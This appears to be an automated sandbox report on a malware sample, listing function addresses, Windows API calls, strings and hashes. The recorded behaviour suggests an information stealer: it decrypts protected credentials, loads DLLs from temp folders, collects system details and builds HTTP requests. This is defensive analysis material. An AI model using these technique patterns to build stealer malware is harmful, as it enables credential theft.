Function 006206A3 Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 00620754, 00620757, 0062075C
l, xrefs: 006206DE
., xrefs: 006206D7

Memory Dump Source

Source File: 00000000.00000002.1908645420.000000000061F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0061F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61f000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 24138d88fe7499a083de265e74783976d300f5581240314613688d94ca148035
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: B03147B6904619DFEB10CF98D880AADBBF6FB08324F24015AD841A7351D7B1EA45CFA4

Function 004094C4 Relevance: 3.0, APIs: 2, Instructions: 33encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 004094E5
LocalFree.KERNEL32(?), ref: 0040950A

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotect
String ID:
API String ID: 1561624719-0
Opcode ID: 7af865200370c71dc1aeec28a3f245545c66ce1c623f0b7719112b5aa0c6dde3
Instruction ID: 8d19d854ff734d332b2dbdc515c77238868d08609e2067f50d6fa790567ddd23
Opcode Fuzzy Hash: 7af865200370c71dc1aeec28a3f245545c66ce1c623f0b7719112b5aa0c6dde3
Instruction Fuzzy Hash: 85F0B4B17043007BD7009E5ACC81B4BB7D8AB84710F10893EB558DB2D2D774D8054B5A

Function 00420076 Relevance: 1.6, APIs: 1, Instructions: 127timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(00447DA8), ref: 00420091

Memory Dump Source

Source File: 00000000.00000002.1908458496.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_420000_8p5iD52knN.jbxd

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: 7ce7c80205453f68d12abce02f74676c1c00403a76305533c351296e9444cde0
Instruction ID: 7b922c0b01b976be8ebb097135107baff558c949ac8418f226cba57d9fc1e1fb
Opcode Fuzzy Hash: 7ce7c80205453f68d12abce02f74676c1c00403a76305533c351296e9444cde0
Instruction Fuzzy Hash: 5C417071E042289FDB10DF98EC81AAE7BF5EF09300F54416BE400A7262D7798D52CB28

Function 00404B4C Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404BB2), ref: 00404B72

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: b9dbded4df740f95a366ffb3c725a865bd77cd50a76c54eebdafbaeb84b8c7b9
Instruction ID: e83552b6022aae669f2d5c27f359814ee46eaea323ddb5c136f95371eef2deca
Opcode Fuzzy Hash: b9dbded4df740f95a366ffb3c725a865bd77cd50a76c54eebdafbaeb84b8c7b9
Instruction Fuzzy Hash: 0FF0A470A04209AFEB15DE91CC41A9EF7BAF7C4714F40847AA610762C1E7B86A048698

Function 0040A4A4 Relevance: 1.5, APIs: 1, Instructions: 16comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0041B0DC,00000000,00000005,0040A4CC,00000000,?,00000000,0040A52D,0041A69E), ref: 0040A4BC

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 7b7d34e0f70cbabb5746a0b5785e83bae371d3c5d3f6c4cc1dc965a66d09d6f2
Instruction ID: ecfa08d63a5e99a02bf1f10941cb6c6ba3816feefb3116676bc77a3be9f2b9a2
Opcode Fuzzy Hash: 7b7d34e0f70cbabb5746a0b5785e83bae371d3c5d3f6c4cc1dc965a66d09d6f2
Instruction Fuzzy Hash: E5C002953917243AE551B2AA2CCAF5B418C4B88B59F214177B618F61D2A5E85C2001AE

Function 0061F142 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1908645420.000000000061F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0061F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61f000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b45195dd31b221fbb09478d2c584d7bb78475a2a599777f6b4d9a6f7db87f26d
Instruction ID: 6fb67732f4a9a656f062a0a1282118566c73178d40539d3e0fac5baac77657bf
Opcode Fuzzy Hash: b45195dd31b221fbb09478d2c584d7bb78475a2a599777f6b4d9a6f7db87f26d
Instruction Fuzzy Hash: A1C1A29680E3C25FDB078B745C792917F706E2B10975E86DFC4C68E8E7E2988486D363

Function 00620B08 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1908645420.000000000061F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0061F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61f000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
Instruction ID: 0c47d064375a7c6926ec4af01915e762942a65c6bed9016b76a5bd20d10caa7d
Opcode Fuzzy Hash: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
Instruction Fuzzy Hash: 9FF0AF76A00A148FEB20CF24E845BAA73A6EB8530AF1444A4D90AD7246D330A9418E90

Function 00407A34 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
Instruction Fuzzy Hash:

Function 0040561C Relevance: 220.8, APIs: 63, Strings: 63, Instructions: 312libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00419155), ref: 0040562D
GetProcAddress.KERNEL32(00000000,ExpandEnvironmentStringsW), ref: 0040563C
GetProcAddress.KERNEL32(00000000,GetComputerNameW), ref: 0040564E
GetProcAddress.KERNEL32(00000000,GlobalMemoryStatus), ref: 00405660
GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00405672
GetProcAddress.KERNEL32(00000000,GetFileSize), ref: 00405684
GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00405696
GetProcAddress.KERNEL32(00000000,ReadFile), ref: 004056A8
GetProcAddress.KERNEL32(00000000,GetFileAttributesW), ref: 004056BA
GetProcAddress.KERNEL32(00000000,CreateMutexA), ref: 004056CC
GetProcAddress.KERNEL32(00000000,ReleaseMutex), ref: 004056DE
GetProcAddress.KERNEL32(00000000,GetLastError), ref: 004056F0
GetProcAddress.KERNEL32(00000000,GetCurrentDirectoryW), ref: 00405702
GetProcAddress.KERNEL32(00000000,SetEnvironmentVariableW), ref: 00405714
GetProcAddress.KERNEL32(00000000,GetEnvironmentVariableW), ref: 00405726
GetProcAddress.KERNEL32(00000000,SetCurrentDirectoryW), ref: 00405738
GetProcAddress.KERNEL32(00000000,FindFirstFileW), ref: 0040574A
GetProcAddress.KERNEL32(00000000,FindNextFileW), ref: 0040575C
GetProcAddress.KERNEL32(00000000,LocalFree), ref: 0040576E
GetProcAddress.KERNEL32(00000000,GetTickCount), ref: 00405780
GetProcAddress.KERNEL32(00000000,CopyFileW), ref: 00405792
GetProcAddress.KERNEL32(00000000,FindClose), ref: 004057A4
GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 004057B6
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004057C8
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004057DA
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004057EC
GetProcAddress.KERNEL32(00000000,GetModuleFileNameW), ref: 004057FE
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00405810
GetProcAddress.KERNEL32(00000000,GetLocaleInfoA), ref: 00405822
GetProcAddress.KERNEL32(00000000,GetLocalTime), ref: 00405834
GetProcAddress.KERNEL32(00000000,GetTimeZoneInformation), ref: 00405846
GetProcAddress.KERNEL32(00000000,RemoveDirectoryW), ref: 00405858
GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040586A
GetProcAddress.KERNEL32(00000000,GetLogicalDriveStringsA), ref: 0040587C
GetProcAddress.KERNEL32(00000000,GetDriveTypeA), ref: 0040588E
GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 004058A0
LoadLibraryA.KERNEL32(advapi32.dll,00000000,CreateProcessW,00000000,GetDriveTypeA,00000000,GetLogicalDriveStringsA,00000000,DeleteFileW,00000000,RemoveDirectoryW,00000000,GetTimeZoneInformation,00000000,GetLocalTime,00000000), ref: 004058AF
GetProcAddress.KERNEL32(00000000,GetUserNameW), ref: 004058BE
GetProcAddress.KERNEL32(00000000,RegCreateKeyExW), ref: 004058D0
GetProcAddress.KERNEL32(00000000,RegQueryValueExW), ref: 004058E2
GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 004058F4
GetProcAddress.KERNEL32(00000000,RegOpenKeyExW), ref: 00405906
GetProcAddress.KERNEL32(00000000,AllocateAndInitializeSid), ref: 00405918
GetProcAddress.KERNEL32(00000000,LookupAccountSidA), ref: 0040592A
GetProcAddress.KERNEL32(00000000,CreateProcessAsUserW), ref: 0040593C
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0040594E
GetProcAddress.KERNEL32(00000000,RegOpenKeyW), ref: 00405960
GetProcAddress.KERNEL32(00000000,RegEnumKeyW), ref: 00405972
GetProcAddress.KERNEL32(00000000,RegEnumValueW), ref: 00405984
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00405996
GetProcAddress.KERNEL32(00000000,CryptCreateHash), ref: 004059A8
GetProcAddress.KERNEL32(00000000,CryptHashData), ref: 004059BA
GetProcAddress.KERNEL32(00000000,CryptGetHashParam), ref: 004059CC
GetProcAddress.KERNEL32(00000000,CryptDestroyHash), ref: 004059DE
GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 004059F0
LoadLibraryA.KERNEL32(user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData,00000000,CryptCreateHash,00000000,CryptAcquireContextA,00000000,RegEnumValueW,00000000), ref: 004059FF
GetProcAddress.KERNEL32(75BD0000,EnumDisplayDevicesW), ref: 00405A14
GetProcAddress.KERNEL32(75BD0000,wvsprintfA), ref: 00405A29
GetProcAddress.KERNEL32(75BD0000,GetKeyboardLayoutList), ref: 00405A3E
LoadLibraryA.KERNEL32(shell32.dll,75BD0000,GetKeyboardLayoutList,75BD0000,wvsprintfA,75BD0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData), ref: 00405A4D
GetProcAddress.KERNEL32(75DA0000,ShellExecuteExW), ref: 00405A62
LoadLibraryA.KERNEL32(ntdll.dll,75DA0000,ShellExecuteExW,shell32.dll,75BD0000,GetKeyboardLayoutList,75BD0000,wvsprintfA,75BD0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000), ref: 00405A71
GetProcAddress.KERNEL32(76E90000,RtlComputeCrc32), ref: 00405A86

Strings

wvsprintfA, xrefs: 00405A1E
Process32NextW, xrefs: 004057E4
SetDllDirectoryW, xrefs: 00405808
SetEnvironmentVariableW, xrefs: 0040570C
FindFirstFileW, xrefs: 00405742
GetTimeZoneInformation, xrefs: 0040583E
CloseHandle, xrefs: 0040568E
GetLocaleInfoA, xrefs: 0040581A
RegOpenKeyW, xrefs: 00405958
ReadFile, xrefs: 004056A0
RegEnumValueW, xrefs: 0040597C
ReleaseMutex, xrefs: 004056D6
GetTickCount, xrefs: 00405778
GetUserNameW, xrefs: 004058B6
kernel32.dll, xrefs: 00405628
GetEnvironmentVariableW, xrefs: 0040571E
Process32FirstW, xrefs: 004057D2
FindClose, xrefs: 0040579C
EnumDisplayDevicesW, xrefs: 00405A09
CryptHashData, xrefs: 004059B2
GetCurrentDirectoryW, xrefs: 004056FA
GetLocalTime, xrefs: 0040582C
LookupAccountSidA, xrefs: 00405922
GetLastError, xrefs: 004056E8
ShellExecuteExW, xrefs: 00405A57
RegCreateKeyExW, xrefs: 004058C8
SetCurrentDirectoryW, xrefs: 00405730
GetModuleFileNameW, xrefs: 004057F6
GetLogicalDriveStringsA, xrefs: 00405874
CryptAcquireContextA, xrefs: 0040598E
GetFileAttributesW, xrefs: 004056B2
FindNextFileW, xrefs: 00405754
CreateToolhelp32Snapshot, xrefs: 004057C0
DeleteFileW, xrefs: 00405862
RegQueryValueExW, xrefs: 004058DA
CryptCreateHash, xrefs: 004059A0
ExpandEnvironmentStringsW, xrefs: 00405634
GlobalMemoryStatus, xrefs: 00405658
RegOpenKeyExW, xrefs: 004058FE
CreateMutexA, xrefs: 004056C4
CryptDestroyHash, xrefs: 004059D6
CreateFileW, xrefs: 0040566A
CheckTokenMembership, xrefs: 00405946
RegEnumKeyW, xrefs: 0040596A
GlobalMemoryStatusEx, xrefs: 004057AE
shell32.dll, xrefs: 00405A48
RegCloseKey, xrefs: 004058EC
CreateProcessW, xrefs: 00405898
GetKeyboardLayoutList, xrefs: 00405A33
RtlComputeCrc32, xrefs: 00405A7B
CryptReleaseContext, xrefs: 004059E8
user32.dll, xrefs: 004059FA
CopyFileW, xrefs: 0040578A
LocalFree, xrefs: 00405766
GetDriveTypeA, xrefs: 00405886
GetComputerNameW, xrefs: 00405646
GetFileSize, xrefs: 0040567C
AllocateAndInitializeSid, xrefs: 00405910
ntdll.dll, xrefs: 00405A6C
CryptGetHashParam, xrefs: 004059C4
advapi32.dll, xrefs: 004058AA
RemoveDirectoryW, xrefs: 00405850
CreateProcessAsUserW, xrefs: 00405934

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: AllocateAndInitializeSid$CheckTokenMembership$CloseHandle$CopyFileW$CreateFileW$CreateMutexA$CreateProcessAsUserW$CreateProcessW$CreateToolhelp32Snapshot$CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$DeleteFileW$EnumDisplayDevicesW$ExpandEnvironmentStringsW$FindClose$FindFirstFileW$FindNextFileW$GetComputerNameW$GetCurrentDirectoryW$GetDriveTypeA$GetEnvironmentVariableW$GetFileAttributesW$GetFileSize$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalDriveStringsA$GetModuleFileNameW$GetTickCount$GetTimeZoneInformation$GetUserNameW$GlobalMemoryStatus$GlobalMemoryStatusEx$LocalFree$LookupAccountSidA$Process32FirstW$Process32NextW$ReadFile$RegCloseKey$RegCreateKeyExW$RegEnumKeyW$RegEnumValueW$RegOpenKeyExW$RegOpenKeyW$RegQueryValueExW$ReleaseMutex$RemoveDirectoryW$RtlComputeCrc32$SetCurrentDirectoryW$SetDllDirectoryW$SetEnvironmentVariableW$ShellExecuteExW$advapi32.dll$kernel32.dll$ntdll.dll$shell32.dll$user32.dll$wvsprintfA
API String ID: 2238633743-617434850
Opcode ID: ed6a8e92284a318c94f0322e28525f172068a9e89f8e16d42c814494dd58fb50
Instruction ID: cfd24dbd3a5623e96a1366eeff91a6eabf16f5ed4c2f56b33555d19b2fe062a0
Opcode Fuzzy Hash: ed6a8e92284a318c94f0322e28525f172068a9e89f8e16d42c814494dd58fb50
Instruction Fuzzy Hash: AEC174B1A80710ABDB01EFA5DC8AA6A37A8FB45705360953BB544FF2D1D678DC018F9C

Function 0040831C Relevance: 33.6, APIs: 16, Strings: 3, Instructions: 323libraryloaderCOMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1

Strings

%appdata%\, xrefs: 004083FC
%TEMP%\, xrefs: 0040838E
PATH, xrefs: 00408448, 00408470, 0040849E

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AddressProc$CreateDirectory$LibraryLoad
String ID: %TEMP%\$%appdata%\$PATH
API String ID: 1305945209-1089150275
Opcode ID: 1a33a2769e6321904e3cdb265ad9754a853bf74ca40744ee91329e9d7d30e973
Instruction ID: 107c2c44d9e3562d342af0426f92bc8293728700e54ee15747b3200e896e575f
Opcode Fuzzy Hash: 1a33a2769e6321904e3cdb265ad9754a853bf74ca40744ee91329e9d7d30e973
Instruction Fuzzy Hash: 08C12A709002059BDB01EBA9DD86BCE77B8EF49308F20457BB454BB2D6CB78AD05CB59

Function 00408324 Relevance: 33.6, APIs: 16, Strings: 3, Instructions: 319libraryloaderCOMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1

Strings

%appdata%\, xrefs: 004083FC
%TEMP%\, xrefs: 0040838E
PATH, xrefs: 00408448, 00408470, 0040849E

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AddressProc$CreateDirectory$LibraryLoad
String ID: %TEMP%\$%appdata%\$PATH
API String ID: 1305945209-1089150275
Opcode ID: 79934f1c985d954dbaeb093b53ec4003d150750486ead7d04ba29fc2d927e3f7
Instruction ID: 2d8dd4a76802c8c05b7f9f6fb250e21a54e9375513618aa46567d80ce5eb0686
Opcode Fuzzy Hash: 79934f1c985d954dbaeb093b53ec4003d150750486ead7d04ba29fc2d927e3f7
Instruction Fuzzy Hash: A7C12A70A002059BDB01EBA9DD86BCE77B8EF45308F20453BB454BB3D5CB78AD058B59

Function 00408328 Relevance: 33.6, APIs: 16, Strings: 3, Instructions: 317libraryloaderCOMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1

Strings

%appdata%\, xrefs: 004083FC
%TEMP%\, xrefs: 0040838E
PATH, xrefs: 00408448, 00408470, 0040849E

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AddressProc$CreateDirectory$LibraryLoad
String ID: %TEMP%\$%appdata%\$PATH
API String ID: 1305945209-1089150275
Opcode ID: 3e01a980fe06b71006a212d9f424134b77ef2a0a464c1b07fa2ce8f8b0dee680
Instruction ID: f743aedec7dbf6b98949553c7d40f8bccc431f9c9a4af862cbdb08e619508236
Opcode Fuzzy Hash: 3e01a980fe06b71006a212d9f424134b77ef2a0a464c1b07fa2ce8f8b0dee680
Instruction Fuzzy Hash: A0C11A70A002059BDB01EBA9DD86BCE77B8EF48309F20453BB454BB3D5DB78AD058B59

Function 00418124 Relevance: 33.5, APIs: 10, Strings: 9, Instructions: 269libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00418535,?,00000000,00000000,?,00418B28,00000000,?,?,?,?,?,0041B0FC,0000044D), ref: 004181B0
LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418535,?,00000000,00000000,?,00418B28,00000000,?,?,?,?,?,0041B0FC), ref: 004181C4
GetProcAddress.KERNEL32(00000000,-0000000C), ref: 004181D8
GetProcAddress.KERNEL32(00000000,-00000017), ref: 004181EF
GetProcAddress.KERNEL32(00000000,-00000025), ref: 00418206
GetProcAddress.KERNEL32(00000000,-0000002C), ref: 0041821D
GetProcAddress.KERNEL32(00000000,-00000031), ref: 00418234
GetProcAddress.KERNEL32(00000000,-00000036), ref: 0041824B
GetProcAddress.KERNEL32(00000000,-0000003C), ref: 00418262
GetProcAddress.KERNEL32(00000000,-00000044), ref: 00418279

Strings

Content-Length: , xrefs: 004183B9
Connection: close, xrefs: 004183A5
, xrefs: 004184B6
, xrefs: 004183FE
Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1), xrefs: 004183AF
Host: , xrefs: 00418398
User-agent: , xrefs: 004183AA
wsock32.dll, xrefs: 0041819D
HTTP/1.0, xrefs: 00418393

Memory Dump Source

Source File: 00000000.00000002.1908436256.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8p5iD52knN.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: $$ HTTP/1.0$Connection: close$Content-Length: $Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$User-agent: $wsock32.dll
API String ID: 384173800-3355491746
Opcode ID: d526fbe7ccd9f0a4c94f3e7aa4b99a8f53a2d889cf2d38f87e34366e75e6ed91
Instruction ID: acd65350bdfe250b2cabb462dd412f1b2f53023e341749034ab9d15be0839763
Opcode Fuzzy Hash: d526fbe7ccd9f0a4c94f3e7aa4b99a8f53a2d889cf2d38f87e34366e75e6ed91
Instruction Fuzzy Hash: 85B1DFB1940219AFDB11EF65CC86BDF7BB8EF44306F50407BF504B2291DB789A458E58

Function 00417278 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 213sleepCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 004173D7
GetSystemMetrics.USER32(00000001), ref: 004173EE

Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C

Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3

Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D

Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC

Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

Layouts: , xrefs: 0041741C
EXE_PATH : , xrefs: 004172D3
[Soft], xrefs: 004174D4
LocalTime: , xrefs: 0041743F
, xrefs: 004172E5, 00417472, 00417490
Windows : , xrefs: 004172F8
Screen: , xrefs: 004173BD
Zone: , xrefs: 00417462
